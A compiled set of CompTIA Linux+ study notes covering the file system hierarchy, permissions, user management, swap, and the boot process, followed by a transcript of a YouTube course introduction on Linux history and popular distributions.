2. File System Hierarchy and Navigation:
• The File System Hierarchy Standard (FHS) defines a consistent directory structure across Linux distributions. Key directories include / (root), /bin (binaries), /sbin (system binaries), /etc (configuration files), /home (user directories), /var (variable data), /tmp (temporary files), and /dev (device files). “the home of everything is the root, and it’s represented by this singular forward slash”
• The /bin directory contains essential binary executables, accessible to all users. “the bin or the binaries directory contains essential binary executables that are needed during the boot process or in single user mode”
• The /sbin directory contains binary executables for system administration, requiring root privileges. “the sbin is known as the system binaries folder, and these are the binary executables that are used for system administration; it typically requires root privileges to execute them”
• The /dev directory provides a virtual interface to physical devices. “the dev folder [provides] important device abstraction: by treating devices as files, Linux provides a consistent interface for interacting with various hardware devices”
    • Common commands for navigation: pwd (print working directory), ls (list files), cd (change directory).
    • Commands for file manipulation: cp (copy), mv (move/rename), rm (remove), mkdir (make directory), rmdir (remove directory).
3. File Systems:
• ext4: A widely used file system balancing performance and reliability. “ext4, which is balanced performance and reliability, and is known to be compatible with all different versions of the OS”
• xfs: Designed for performance and scalability, popular in enterprise environments and large databases. “the XFS file system is for performance and scalability; it’s a very popular choice in enterprise environments”
• NTFS: Used in modern Windows operating systems, requires consideration for cross-platform compatibility. “NTFS, the New Technology File System, is actually a file system that’s been used in modern Windows operating systems; it’s reliable, it’s secure, and it performs well”
• FAT32: Commonly used for USB flash drives and external hard drives (max 2TB), compatible with various OSes. “FAT32, for the most part, is being used by one individual person, for like a home computer or something like that, or maybe a USB drive or an external hard drive that is maxed out at 2 terabytes”
• Formatting tools: mkfs (make file system) can format partitions with different file systems; back up your data first, as formatting wipes the partition. “mkfs is used to format partitions with different file systems”
4. System Architecture: Kernel, Shell, User Space
• Kernel: The core component, acting as the bridge between hardware and software. It manages system resources. “the kernel is the core component of a Linux-based operating system; it’s basically the bridge between the hardware and the software layers”
    • Shell: A command-line interpreter that allows users to interact with the kernel. “the shell is a command line interpreter that facilitates communication with the kernel”
    • User Space: The environment where user-level applications execute, separated from the kernel for stability and security. “user space is the environment where the user level applications actually execute”
5. Boot Process:
    • BIOS/UEFI: Initializes hardware and passes control to the bootloader.
    • Bootloader (e.g., GRUB): Loads the operating system kernel.
• Init System (e.g., systemd, SysVinit): Starts system services and processes. “init is actually the traditional initialization system that was used in Linux distros to start system services and processes during boot”
• systemd is faster, more flexible, and more feature-rich, and is the current standard init system.
6. Package Management and Installation:
• Selecting a Linux distribution is based on the task you want to accomplish. There are desktop versions, server versions, security versions, etc.
• The process of flashing an ISO image to a USB drive using tools like Etcher is covered.
• The presenter demonstrates how to find the drive assigned to the USB device before flashing the ISO image.
7. Partitions and Mounting:
• Understanding the concept of primary, extended, and logical partitions. Partitioning essentially creates the containers that hold the files.
    • Mounting file systems: Attaching a file system to a directory to make it accessible. “when you mount something you’re attaching the file system to a directory so that it’s accessible within the larger directory tree”
• /etc/fstab: Configuration file defining file systems to be automatically mounted at boot. “[/etc/fstab is the] configuration file that defines all the file systems that should be automatically mounted when you start your system”
8. Swap Space:
• Swap space acts as virtual memory when physical RAM is exhausted, preventing out-of-memory errors. “swap [acts as] a buffer to prevent out-of-memory errors, meaning that the system can’t run because the physical memory has been maxed out”
    • Creating swap partitions or swap files is covered.
9. Process and Service Management:
    • Processes, daemons, and services and the relationship between them.
    • Daemons are background processes.
• Services group daemons to provide specific functionality. “service [is] the higher-level concept, meaning that they group one or more daemons together, and that provides a specific functionality”
    • Managing services using systemctl (enable, disable, start, stop, status).
10. User Authentication and Permissions:
• /etc/passwd: Stores user account information (usernames, user IDs, etc.). “the /etc/passwd file stores all of the usernames, so the user accounts themselves; there are no password hashes or any plain text or anything like that inside of this file”
    • /etc/shadow: Stores password hashes (sensitive file, access must be restricted).
• File permissions (read, write, execute) for owner, group, and others. The acronyms are R, W, and X. “permissions go by read, write, and execute, and they have acronyms for them: R would be for read, W would be for write, and then X would be to execute”
    • Special permissions: SUID, SGID, sticky bit. “sticky bit on a directory only the file owner or directory owner can delete or modify the files within it regardless of the group or other right permissions or anything else”
    • sudo and user authentication.
11. Shell Scripting:
• Shell scripts are text files containing a series of commands. “shell scripting is an extension of the shell’s interactions and commands that essentially allows you to create a document and put a bunch of commands inside of it”
    • Used for automation and repetitive tasks.
    • Key concepts: Shebang line (#!/bin/bash), comments (#), variables, conditional statements (if, else), loops (for, while).

    Quotes of Importance:

• “Torvalds posted the source code for free on the web, inviting other programmers to improve it, making Linux a collaborative project and the foundation for open-source software, and to this day it is still open source, meaning you can get access to it for free and you can even make modifications to it”
• “without that guy’s permission you cannot make any incorporations into the Linux kernel, or at least not publicly shared; you could probably make the modifications yourself, but you won’t be able to make it one of the distros that are available to everybody else”
• “every time that you request a video to be loaded from YouTube, you’re requesting a packet of data to be delivered to you, and that’s done through your network”

    Recommendations:

    • Reinforce learning with practical exercises and command-line practice.
    • Explore different Linux distributions to understand their specific strengths and use cases.
    • Prioritize understanding file permissions and security concepts to maintain a secure Linux environment.
    • Utilize scripting to automate common tasks and improve efficiency.

    This briefing document provides a comprehensive overview of the Linux training material. By focusing on the main themes and key ideas, it enables individuals to quickly grasp the essential concepts and apply them effectively in real-world scenarios.

    Linux Essentials: Concepts and Architecture

    1. What is Linux and who are some key figures in its development?

    Linux is a free and open-source operating system kernel. Linus Torvalds created it as an alternative to Minix, drawing inspiration from Unix. Richard Stallman and the Free Software Foundation contributed the GNU utilities to the Linux kernel, creating GNU/Linux, the modern version of Linux. Torvalds remains the ultimate authority on the Linux kernel, often referred to as the “benevolent dictator” of Planet Linux.

    2. What are Linux distributions (distros) and what are some popular examples?

    Linux distributions, or distros, are different versions of the Linux OS that bundle the Linux kernel with other software. Popular examples include Ubuntu (user-friendly, for general users), CentOS/Red Hat Enterprise Linux (stable, for enterprise environments), Debian (for servers and advanced users), Fedora (for developers, cutting-edge), and Kali Linux (for cyber security and ethical hacking).

    3. What are some common uses of Linux?

    Linux is used in a variety of environments, including servers, embedded systems/IoT devices, software development, cyber security, cloud computing (AWS, Google Cloud), and data centers. Its versatility and open-source nature make it suitable for a wide range of applications.

    4. What are some important directories in the Linux file system hierarchy?

    Some key directories include:

    • / (root): The top-level directory, the home of everything
    • /bin (binaries): Essential binary executables needed during the boot process or in single-user mode, accessible to all users.
    • /sbin (system binaries): Binary executables for system administration, requiring root privileges.
    • /dev (devices): Represents device files that provide an interface to hardware devices.
    • /home: Contains personal directories for individual users.

    5. What is the /dev directory and why is it important?

    The /dev directory contains device files, which provide an interface for interacting with hardware devices as if they were files. This allows for consistent interaction with various hardware through commands. When you connect a USB drive, for example, a file or folder corresponding to that device appears in /dev, allowing command-line interaction.

    6. How do I determine file system type?

To determine the file system type, run lsblk -f, which displays the file system type of each block device along with its UUID and label.

    7. What is shell scripting and why is it useful?

    Shell scripting involves creating text files containing a series of commands that can be executed sequentially. It’s a powerful tool for automation, allowing users to automate repetitive tasks. Shell scripts start with a shebang line (#!) indicating the interpreter to use. The rest of the script contains commands, often with comments (lines starting with #) explaining the code. Control flow structures (if/else, while loops) and variables are essential components of shell scripts.
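For illustration, here is a minimal sketch that uses each of those pieces; the script name, threshold value, and messages are made up for this example:

    #!/bin/bash
    # check_disk.sh - warn when the root file system crosses a usage threshold
    THRESHOLD=80                                        # variable: percentage considered "full"
    usage=$(df / | awk 'NR==2 {print $5}' | tr -d '%')  # current usage of / as a bare number
    if [ "$usage" -gt "$THRESHOLD" ]; then              # conditional statement
        echo "Warning: root file system is ${usage}% full"
    else
        echo "Disk usage OK (${usage}%)"
    fi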

    8. What are the three key components of the Linux system architecture?

    The Linux system architecture consists of three main components:

    • Kernel: The core component that acts as the bridge between hardware and software, managing system resources.
    • Shell: A command-line interpreter that allows users to interact with the kernel and execute commands.
    • User Space: The environment where user-level applications execute, separate from the kernel for stability and security.

    Linux System Administration Essentials

    Linux administration involves several key aspects, including system architecture, installation, package management, file management, user and group management, process and service management, and job scheduling.

    System Architecture and Boot Process

    • Understanding the Linux system architecture is crucial, including the kernel, shell, user space, basic input/output system (BIOS), Unified Extensible Firmware Interface (UEFI), GRand Unified Bootloader (GRUB), and init system.
    • The file system hierarchy standard (FHS) defines the directory structure, ensuring consistency across distributions. Key directories include root, bin, sbin, etc, home, var, and tmp.
    • The kernel is the core, bridging hardware and software by managing resources.
    • The shell is a command-line interpreter for interacting with the kernel.
    • The boot process involves BIOS/UEFI initializing hardware, the bootloader loading the OS, and the init system starting system services.

    Installation and Package Management

    • Installing Linux involves choosing a distribution based on specific needs, such as Ubuntu, CentOS, Debian, Fedora, or Kali Linux.
    • The installation process includes downloading an ISO image, creating bootable media, and configuring partitions.
    • Package managers are used to update, remove, and troubleshoot software packages.

    File Management

    • File management includes creating partitions and understanding primary, extended, and logical partitions.
    • File systems like ext4 and XFS are also important, as well as understanding mount points.
    • Commands such as mkfs (make file system) are needed for formatting partitions.

    User and Group Management

    • User management involves creating, modifying, and deleting user accounts. Commands such as useradd, usermod, and userdel are used for these tasks.
    • Group management involves creating and managing groups to organize users. Commands such as groupadd and groupdel are used to manage groups.

    Process and Service Management

    • Process management involves understanding daemons, services, and process management commands.
    • Important commands include ps for viewing processes and systemctl for managing services.
    • Job scheduling can be achieved using cron jobs for recurring tasks and the at command for one-time tasks.
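A rough sketch of the commands in the list above; the service name (nginx) and the script path are hypothetical, and the at daemon may need to be installed separately:

    ps aux | grep nginx                          # view running processes matching a name
    sudo systemctl status nginx                  # check the state of a service
    sudo systemctl restart nginx                 # restart it
    crontab -e                                   # edit your cron table; a line such as
                                                 #   0 2 * * * /usr/local/bin/backup.sh
                                                 # runs the script every day at 2:00 AM
    echo "/usr/local/bin/backup.sh" | at 02:00   # schedule the same job once with at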

    Linux File System Administration: Types, FHS, and Management

    File systems are a critical component of Linux administration, involving how data is stored, accessed, and managed. Key aspects include file system types, the file system hierarchy standard (FHS), mount points, and various management tools.

    File System Hierarchy Standard (FHS)

    • The FHS defines the directory structure in Linux, ensuring consistency across different distributions.
    • Key directories include:
• Root directory: Top-level directory for the entire system. All other directories are extensions of the root.
• /bin: Contains essential user commands.
• /sbin: System binaries, typically for administration, requiring root privileges.
• /etc: Houses configuration files for services and applications. It is known as the control center.
• /home: Houses user directories.
• /var: Stores variable data such as system logs.
• /tmp: Houses temporary data, often wiped on reboot.

    File System Types

    • ext4: The fourth extended file system, is a journaling file system and the default in many Linux distributions. It supports large files and is reliable.
    • XFS: A high-performance journaling file system often used in enterprise environments for its scalability and reliability. It is optimized for sequential read and write operations.
    • NTFS: (New Technology File System) Used in Windows, it’s included because of the need for interoperability between Linux and Windows systems.
    • FAT32: Known for its simplicity and broad compatibility; though older, it is still used due to its cross-platform compatibility. It has a limited file size of 4GB and a partition size limit of 2TB.

    Mount Points

    • Mounting attaches a file system to a directory, making it accessible within the larger directory tree. The mount command is used for this purpose.
    • Automatic mounting is configured in the /etc/fstab file, which defines file systems to be automatically mounted at boot. Each line in /etc/fstab represents a file system and its mount options.
    • Unmounting a file system is done using the umount command, preventing data loss or corruption.
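A minimal sketch of that mount/unmount cycle, using a hypothetical device and mount point:

    sudo mount /dev/sdb1 /mnt/data     # attach the file system on /dev/sdb1 at /mnt/data
    # equivalent /etc/fstab entry for mounting it automatically at boot:
    #   /dev/sdb1  /mnt/data  ext4  defaults  0  2
    sudo umount /mnt/data              # detach it safely before unplugging or repartitioning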

    Partitioning

    • Partitions are logical divisions of a physical storage device, allowing the operating system to manage data in isolated areas.
• Common primary partitions include the root partition, boot partition, home partition, and swap partition. Under the traditional MBR scheme, a disk is limited to a maximum of four primary partitions.
    • Extended partitions can contain multiple logical partitions.

    Tools and Commands for File System Management

    • mkfs (make file system): Used to format a partition with a specified file system type.
    • lsblk: Lists block devices (disks and partitions) in a tree-like format.
    • fdisk: A command-line utility for creating, modifying, and deleting partitions.
    • fsck (file system check): A utility for checking and repairing file system consistency.
    • parted: A versatile command-line tool supporting both MBR and GPT partition schemes, ideal for resizing and modifying partitions.
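A short sketch of how the tools above fit together on a hypothetical second disk (/dev/sdb); note that mkfs wipes the partition it formats:

    lsblk -f                      # list block devices with file system type, UUID, and label
    sudo fdisk /dev/sdb           # interactively create or modify partitions on the disk
    sudo mkfs -t ext4 /dev/sdb1   # format the new partition as ext4 (this wipes it)
    sudo fsck /dev/sdb1           # check the (unmounted) file system for consistency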

    Swap Space

    • Swap space is virtual memory on the hard drive, used when physical RAM is exhausted. It can be a partition or a file.
    • Commands like mkswap (make swap) initialize a partition for use as swap, while swapon and swapoff activate and deactivate swap spaces, respectively.
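A minimal sketch of that swap workflow, assuming a spare partition /dev/sdb2 exists:

    sudo mkswap /dev/sdb2     # initialize the partition as swap space
    sudo swapon /dev/sdb2     # activate it
    swapon --show             # confirm which swap spaces are active
    sudo swapoff /dev/sdb2    # deactivate it again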

    Linux Permissions Management: A Concise Guide

    Permissions management in Linux is a fundamental aspect of system administration, focused on controlling access to files and directories. It ensures that only authorized users can read, write, or execute files, maintaining system security and data integrity. The key components of permissions management include permission models, commands for modifying permissions, and special permissions.

    Permission Models

    • Levels of Access: There are three levels of access: owner, group, and others.
    • Owner: Typically the user who created the file or directory, possessing the highest level of control.
    • Group: A collection of users who are assigned specific permissions.
    • Others: All users who are neither the owner nor members of the group.
    • Types of Permissions: Permissions are categorized into read, write, and execute.
    • Read (r): Allows viewing the contents of a file or listing the contents of a directory.
    • Write (w): Permits modifying or deleting a file or directory.
    • Execute (x): Enables running a program or script, or accessing a directory.

    File Permission Representation

• When viewing file permissions, the output typically looks like this: -rwxr-xr--.
    • The first character indicates the file type: – for a regular file, d for a directory.
    • The next three characters represent the owner’s permissions.
    • The following three characters represent the group’s permissions.
    • The last three characters represent the permissions for others.
• Example: -rwxr-xr-- indicates a regular file. The owner has read, write, and execute permissions; the group has read and execute permissions; and others have only read permissions.

    Commands for Modifying Permissions

    • chmod (change mode): Used to change the permissions of a file or directory.
    • Symbolic Method: Uses symbols to add or remove permissions. For example, chmod u+x file adds execute permission to the owner of the file.
    • Numeric (Octal) Method: Uses numeric values to set permissions. Each permission has a value: read=4, write=2, execute=1. The sum of these values represents the permissions. For example, chmod 755 file gives the owner read, write, and execute permissions (4+2+1=7), and the group and others read and execute permissions (4+1=5).
    • chown (change owner): Used to change the owner of a file or directory.
    • chgrp (change group): Used to change the group associated with a file or directory.
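A quick sketch of those three commands side by side; the file name, user, and group are hypothetical:

    chmod u+x script.sh               # symbolic: add execute permission for the owner
    chmod 755 script.sh               # numeric: rwx for the owner (7), r-x for group and others (5)
    sudo chown alice script.sh        # make alice the owner of the file
    sudo chgrp developers script.sh   # associate the file with the developers group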

    Special Permissions

    • SUID (Set User ID): When set on an executable file, it allows the file to be executed with the privileges of the owner, not the user running it. It is represented by an “s” in the owner’s execute permission slot.
    • SGID (Set Group ID): Similar to SUID, but it applies to the group. When set on a directory, any files created within that directory inherit the group ownership of the directory.
    • Sticky Bit: When set on a directory, only the file owner or directory owner can delete or modify files within it, regardless of group or other write permissions.

    User Authentication

    • /etc/passwd: Stores user account information, including usernames, but no password hashes.
    • /etc/shadow: Stores encrypted password hashes and other security information. Should only be readable by the root user.

    Managing Pseudo Permissions

    • Granting users the ability to execute commands with root privileges via sudo is a critical aspect of system administration.
    • This involves adding users to the sudo group and configuring the /etc/sudoers file to define command restrictions.
    • The visudo command is used to safely edit the /etc/sudoers file, checking for syntax errors before saving.
    • Within the /etc/sudoers file, you can specify which commands a user can run with sudo. For example: username ALL=(ALL:ALL) /path/to/command. This setup ensures users have the necessary permissions to perform administrative tasks while maintaining security.
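A brief sketch of that workflow; the username is hypothetical, and the group is named sudo on Debian-based systems (wheel on Red Hat-style systems):

    sudo usermod -aG sudo alice   # add alice to the sudo group
    sudo visudo                   # safely edit /etc/sudoers; an entry restricting alice to one command:
                                  #   alice ALL=(ALL:ALL) /usr/bin/systemctl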

    Linux User Management: A System Administration Guide

    User management in Linux is a critical aspect of system administration. It involves creating, modifying, and deleting user accounts to control access to the system and its resources. Effective user management ensures system security and integrity by granting appropriate permissions and privileges to different users.

    Key aspects of user management include:

    • Creating Users: User accounts can be created using the useradd or adduser command, depending on the Linux distribution.
    • The basic syntax is sudo useradd username or sudo adduser username.
    • Additional options can be used to specify the home directory, login shell, and supplementary groups for the user.
    • For example, sudo useradd -m -d /data/users/alice -s /bin/bash -G developers,admins alice creates a user named “alice”, assigns the home directory to /data/users/alice, sets the login shell to /bin/bash, and adds the user to the “developers” and “admins” groups.
    • Setting Passwords: After creating a user, a password must be set using the passwd command.
    • The syntax is sudo passwd username.
    • It is common practice to expire the initial password, forcing the user to set a new one upon first login, e.g. sudo passwd --expire username (equivalently, sudo chage -d 0 username); see the consolidated example after this list.
    • Modifying Users: Existing user accounts can be modified using the usermod command.
    • This command can change the username, lock or unlock an account, and modify group memberships.
    • For example, sudo usermod -l newusername oldusername changes the username from “oldusername” to “newusername”.
    • The -L option locks an account, and the -U option unlocks it.
    • Deleting Users: User accounts can be deleted using the userdel command.
    • The syntax is sudo userdel username.
    • The -r option removes the user’s home directory and all its contents. For example: sudo userdel -r username.
    • Groups:
    • Groups are managed using commands such as groupadd to create groups and groupdel to delete them.
    • A primary group is the main group associated with a user. When a user creates a file, the group ownership of that file is set to the user’s primary group.
    • Supplementary groups are additional groups that a user is a member of, granting them access to resources associated with those groups.
    • A user can be added to a supplementary group using the usermod command with the -aG option. For example: sudo usermod -aG groupname username.
    • File Permissions and Ownership:
    • Every file and directory in Linux has associated permissions that determine who can read, write, or execute the file.
    • Permissions are defined for the owner, the group, and others.
    • The chmod command is used to modify permissions, chown to change the owner, and chgrp to change the group.
    • Special Permissions:
    • Special permissions like SUID, SGID, and the sticky bit can be set to modify how files are executed or accessed.
    • SUID allows a file to be executed with the privileges of the owner.
    • SGID, when set on a directory, causes new files and subdirectories to inherit the group ownership of the parent directory.
    • The sticky bit, when set on a directory, restricts file deletion and modification to the owner of the file, the directory owner, and the root user.
    • User Authentication Files:
    • The /etc/passwd file stores basic user account information, such as usernames, user IDs, group IDs, home directories, and login shells. However, it does not store password hashes.
    • The /etc/shadow file stores encrypted password hashes and other password-related information. It should be readable only by the root user.
    • Managing Sudo Permissions: configured exactly as described under “Managing Sudo Permissions” above; add users to the sudo group and use visudo to safely edit /etc/sudoers and define per-user command restrictions.
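
    Pulling the commands above into one end-to-end sketch; the user, groups, and paths are placeholders, not values from the source:

    ```bash
    # Create a group, then a user with a home directory, shell, and supplementary group.
    sudo groupadd developers
    sudo useradd -m -d /data/users/alice -s /bin/bash -G developers alice

    # Set an initial password, then expire it so alice must change it at first login.
    sudo passwd alice
    sudo passwd --expire alice     # equivalent: sudo chage -d 0 alice

    # Modify later: rename, lock/unlock, add another supplementary group.
    sudo usermod -l alice2 alice   # home path stays put unless you also pass -d ... -m
    sudo usermod -L alice2         # lock the account; -U unlocks it
    sudo groupadd admins
    sudo usermod -aG admins alice2

    # Verify, then remove the account along with its home directory.
    id alice2
    sudo userdel -r alice2
    ```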

    Linux System Boot Process: BIOS, Bootloader, and Initialization

    The system boot process in Linux involves several stages, starting from the hardware initialization to the loading of the operating system. Key components and processes include BIOS/UEFI, bootloaders, and initialization systems.

    • BIOS/UEFI:
    • BIOS (Basic Input/Output System) is firmware used in older systems to initialize hardware and pass control to the bootloader.
    • It conducts a Power-On Self-Test (POST) to check the hardware, issuing beep codes to indicate test outcomes, and initializes essential devices like the keyboard, mouse, and disk drives.
    • UEFI (Unified Extensible Firmware Interface) is a modern interface replacing BIOS, offering a more flexible, faster, and secure boot process.
    • UEFI can boot systems faster and supports a user-friendly graphical interface.
    • It enhances security with features like secure boot, protecting the system from malicious software attacks, and supports larger disk drives.
    • UEFI also allows booting from network resources, facilitating remote system deployment and management.
    • Both BIOS and UEFI perform POST, execute the bootloader, and initiate the operating system boot.
    • Bootloader (GRUB):
    • The bootloader acts as an intermediary between the BIOS/UEFI and the operating system.
    • GRUB (Grand Unified Bootloader) is commonly used in Linux distributions.
    • It takes control of the system after BIOS/UEFI and completes the boot process.
    • GRUB loads the kernel and initial RAM disk into memory and transfers control to the kernel.
    • It presents a boot menu, allowing users to choose an operating system in dual-boot or multi-boot systems.
    • GRUB supports multiple OSs, customization of the boot menu, secure boot options, and advanced features like chain loading and network booting.
    • Initialization Systems (SysVinit, systemd):
    • After the bootloader, the system uses an initialization system to start system services and processes.
    • SysVinit is a traditional init system using a sequence of scripts to bring up the system, but it can be complex to configure and is relatively slow due to its sequential processing.
    • It runs scripts located in /etc/init.d to start and stop services.
    • SysVinit uses run levels, each representing a specific system state.
    • systemd is a modern init system that is faster, more flexible, and more feature-rich than SysVinit.
    • It manages the lifecycle of system services, ensures services start in the correct order based on dependencies, and logs system events.
    • systemd starts services in parallel, reducing boot time, and manages dependencies automatically.
    • It provides a unified framework for managing system services and includes features like socket activation, journaling, timers, scheduling, and device management.
    • systemd uses boot targets, which are groups of services that should be started or stopped together, allowing efficient management of system behavior under different circumstances.
    • Run Levels and Boot Targets:
    • Run levels (used in SysVinit) represent specific states of the system, with the system transitioning through them during the boot process.
    • Common run levels include halt (0), single-user mode (1), multi-user mode without networking/NFS (2), multi-user mode without GUI (3), full multi-user mode with GUI (5), and reboot (6); run level 4 is traditionally unused.
    • Boot targets (used in systemd) replace run levels and represent groups of services to be started or stopped together.
    • Common targets include multi-user.target (default multi-user mode), graphical.target (graphical services), rescue.target (system recovery), and emergency.target (minimal services for system maintenance).
    • Service Management:
    • In systemd, services are managed using systemctl commands.
    • Common commands include sudo systemctl start service, sudo systemctl stop service, sudo systemctl enable service, sudo systemctl disable service, and systemctl status service.
    • In SysVinit, the service command is used with similar options but a slightly different syntax.
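
    A hedged sketch of both styles; the nginx unit is just an example service, and unit names vary by distribution:

    ```bash
    # systemd service management:
    sudo systemctl start nginx
    sudo systemctl stop nginx
    sudo systemctl enable nginx    # start automatically at boot
    sudo systemctl disable nginx
    systemctl status nginx         # state, PID, and recent log lines

    # Boot targets replace run levels:
    systemctl get-default                        # e.g. graphical.target
    sudo systemctl set-default multi-user.target

    # SysVinit equivalent syntax:
    sudo service nginx start
    sudo service nginx status
    ```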

    Full Linux+ (XK0-005 – 2024) Course Pt. 1 | Linux+ Training

    The Original Text

    Tesla cars, the Google search engine and Gmail, the Astrobee robots from NASA, PlayStation and Xbox, the trading systems at the New York Stock Exchange, and many other popular services around the world run on Linux. That means there is a lot of benefit to you in learning Linux, and the base certification for Linux is the CompTIA Linux+. Even if you don’t plan on getting your Linux+ certification, this video will help you develop your Linux skill set, and since this channel is all about cybersecurity and hacking, learning Linux will make you a much more capable security pro and a force to be reckoned with.

    This training series is sponsored by Hackaholics Anonymous. To get the supporting materials for this series, like the 900-page slideshow, the 200-page notes document, and all of the pre-made shell scripts, consider joining the Agent tier; you’ll also get monthly exclusive Python automation content and direct access to me via Discord.

    A couple of quick notes on format. The series is half lecture and half practical commands that we actually run inside of Linux on the command line. The lecture portion goes up to chapter 11 and covers everything in the notes document and the slides. In chapter 3 we go through the installation of Linux together, click by click, so you have a lab environment even if you don’t have Linux on your computer; macOS can be similar to Linux, but I want you to practice inside an actual Linux environment, so you’ll see how to download an ISO file and install it yourself. Then, in chapter 12, we get to the practical portion: twelve subsections of hands-on commands, from getting system information all the way to scripting and creating shell scripts.

    The video itself is free, though it will most likely be split into two videos, because YouTube caps uploads at the 12-hour mark. The notes and the slides are part of the Hackaholics Anonymous membership. For price comparison: CompTIA’s exam voucher alone is $369, and their bundle with the labs, education videos, and notes runs $1,165, so you’re looking at several hundred dollars at minimum for anything comparable. The notes and slideshow I’m giving you follow the exact CompTIA Linux+ outline, so you can be sure you’re getting everything you need for the examination at a fraction of the price, probably less than one-tenth.

    Now let’s jump into the outline so you know what to expect. Timestamps are in the description and in the pinned comment at the top of the comment section. Chapter 1 is the intro to Linux and the Linux+ certification: the history of Linux, the available distributions, the benefits of the certification, and the structure of the exam, meaning the categories covered, the format, and any prerequisites. Chapter 2 is system architecture and the boot process, similar to what you would get in an A+ education but without the super in-depth material: the kernel, the shell, user space, the BIOS, UEFI, GRUB, the init system, and so on, and how they all relate to Linux.
    Chapter 3 is the actual installation of Linux: how to install Linux on a USB drive for a live boot, and how to do a full installation if you want it as a second operating system, or if you get hired as a Linux administrator and are asked to install Linux on real machines. Then we go through partitions and file systems, so you know how to create partitions and what primary and extended partitions are, followed by package managers, including installing, updating, removing, and troubleshooting packages.

    Next are the basics of the command line. This part is lecture; every command you’re introduced to here gets practiced in depth in the practical portion, with many variations, so don’t think that because we skim them now we won’t actually run them later. This chapter also covers text editors, manipulating files, and creating basic shell scripts and the various elements a shell script is made of.

    Then comes user and group management: creating and managing users and groups, file permissions and ownership, access control lists, special permissions, and of course authentication and sudo permissions. After that is file management and file systems, which goes deeper than the earlier introduction: how to mount and unmount a file system, how to create file systems using fdisk and mkfs (the make-file-system command), how to create and configure partitions, and how to manage swap space, which is a separate partition of its own.

    Then process and service management, which is very important for a Linux sysadmin: what a daemon is, what services are, process management commands, service management commands, and scheduling jobs. Then networking. This is not a replacement for Network+ training, but you will learn enough to be dangerous: how to navigate the network infrastructure, IP addressing, DNS, the Dynamic Host Configuration Protocol, how to use the NetworkManager CLI, how to troubleshoot network issues, and managing firewalls with UFW (the Uncomplicated Firewall) as well as iptables.

    Then security and access management. This is a cybersecurity channel, so security is a very big deal to me: file system security, file permissions, access control lists, network security, user authentication methods, configuring Secure Shell, data encryption, secure file transfer, and a lot of other things that fall under that category. Then troubleshooting and system maintenance: analyzing and interpreting log files, disk usage analysis, backup and restoration strategies, and system performance monitoring.

    Then virtualization and cloud concepts. This wasn’t listed as an official Linux+ category, but I think it’s very important, because if you go into DevOps or become a Linux sysadmin you will most likely deal with a cloud environment; companies these days rarely set up physical servers and instead buy virtual servers from AWS or Google Cloud. You’ll learn what a virtual machine is, what a container is, and how to use tools like VirtualBox and Docker. It isn’t required for Linux+, but it will make you a more capable administrator, and if it does show up on an updated version of the exam by the time you watch this, you’ll be ready.

    Finally, we get to the practice command portion, which is massive all by itself, plus exam preparation: the key commands for the Linux+ exam, preparation resources like practice labs, mock exams and study guides, a bunch of mock questions to review, exam-day tips, and the final wrap-up.
    This is going to be a comprehensive training course, and I want it to be useful whether or not you take the examination. Whether you decide to become certified shouldn’t matter, because by the end of this you should be so functional and competent with Linux that, even without the certification, you can do the requirements of any Linux sysadmin job, put that confidently on your resume and portfolio, and point to the shell scripts you’ve created as proof of proficiency. I hope you go through the entire thing, but in case you want to skip around to the sections relevant to you, the timestamps are all below. I’ll be talking quickly to cram as much content into this video as humanly possible, so you probably won’t need to speed up the playback. Let’s jump into the very first section.

    Introduction to Linux and the Linux+ certification: an overview of the history, the distros, and the common uses. Linux was created in 1991 by Linus Torvalds, who developed it as a hobby while studying at the University of Helsinki. I don’t know what you do as a hobby, but this guy created an entire operating system. The goal was a free, open-source alternative to MINIX, which was Unix-like. Version 0.02 of the Linux kernel was released in 1991, and version 1.0 in 1994. Torvalds posted the source code for free on the web, inviting other programmers to improve it, which made Linux a collaborative project and a foundation for open-source software. To this day it is still open source: you can get it for free and even modify it, though changes only make it into the mainline kernel with approval. Separately, Richard Stallman, an American, and the Free Software Foundation created GNU, an open-source Unix-like OS, and the GNU utilities added to the Linux kernel form GNU/Linux, the modern version of Linux that you and all the companies mentioned at the start of the video actually use. Linux became a complete Unix clone and is now used everywhere, and Torvalds remains the ultimate authority on what new code is incorporated into the Linux kernel; he is known as the benevolent dictator of planet Linux. Without his sign-off your changes don’t ship in the kernel everybody else gets; you can modify your own copy, but it won’t become one of the publicly available distros.

    Now for the popular Linux distributions and the purposes they serve. Distributions, a.k.a. distros, are different versions of the Linux OS that bundle the Linux kernel with other software: the kernel is the base, and different additions on top create the various distributions. Ubuntu is the most commonly used; it’s popular with general users, beginners, and people who want Linux as a desktop environment, and it’s known for user-friendliness, shipping with a GUI, point-and-click tools, and a lot of useful pre-installed software. It was my own first introduction to Linux. CentOS and Red Hat Enterprise Linux (RHEL) are used in enterprise environments, mainly for stability and dedicated vendor support; a company can reach an actual support team, and they hold up well in large environments. Debian is known for servers and advanced users, largely because you typically won’t get a graphical user interface; some installs have one, but for the most part it’s a command line, and it’s a very big player in the server world. Fedora is great for developers: more cutting-edge, with a lot of innovations and utilities pre-installed, aimed at people going into coding and software development. And last but not least, my favorite: Kali Linux, the distribution for cybersecurity professionals and ethical hackers, which is us, everybody on this channel. Kali is Debian-based and comes preconfigured with a pile of cybersecurity, ethical hacking, and pen-testing tools. I’m biased, and I love all of Linux, but this one is definitely my favorite, and the logo is absolutely amazing. There are other distros you’ll see as we get to the download links, but these are the most popular, and a quick Google search will show you all the different distributions out there.
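
    If you’re ever unsure which of these distributions a machine is actually running, here is a quick check; the output shown is illustrative, not from the source:

    ```bash
    # Most modern distributions describe themselves in /etc/os-release.
    cat /etc/os-release
    # PRETTY_NAME="Ubuntu 22.04.3 LTS" ...   (illustrative)

    # Kernel release and machine architecture:
    uname -r
    uname -m
    ```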
    As far as the common uses of Linux, we already touched on most of them through the distros. You have servers, and you have embedded systems and IoT devices, where IoT means Internet of Things: a smart appliance like a microwave or a fridge, a router, cars like the Teslas, robots like NASA’s, and many other things that count as embedded systems or IoT devices. Then there’s software development and cybersecurity, obviously, and cloud and data centers: AWS and Google Cloud actually run on Linux, and DevOps and cloud architecture are centered around it. The one major cloud platform that I don’t believe runs on Linux is Microsoft Azure, and even Azure has Linux integration you can use. For the most part, Linux is the primary OS for all of these things; the number of entities, platforms, software, and equipment that use it is massive. So you’re in a good place studying this: you’re adding a skill set that should stay relevant for decades to come, assuming the human race is still around.

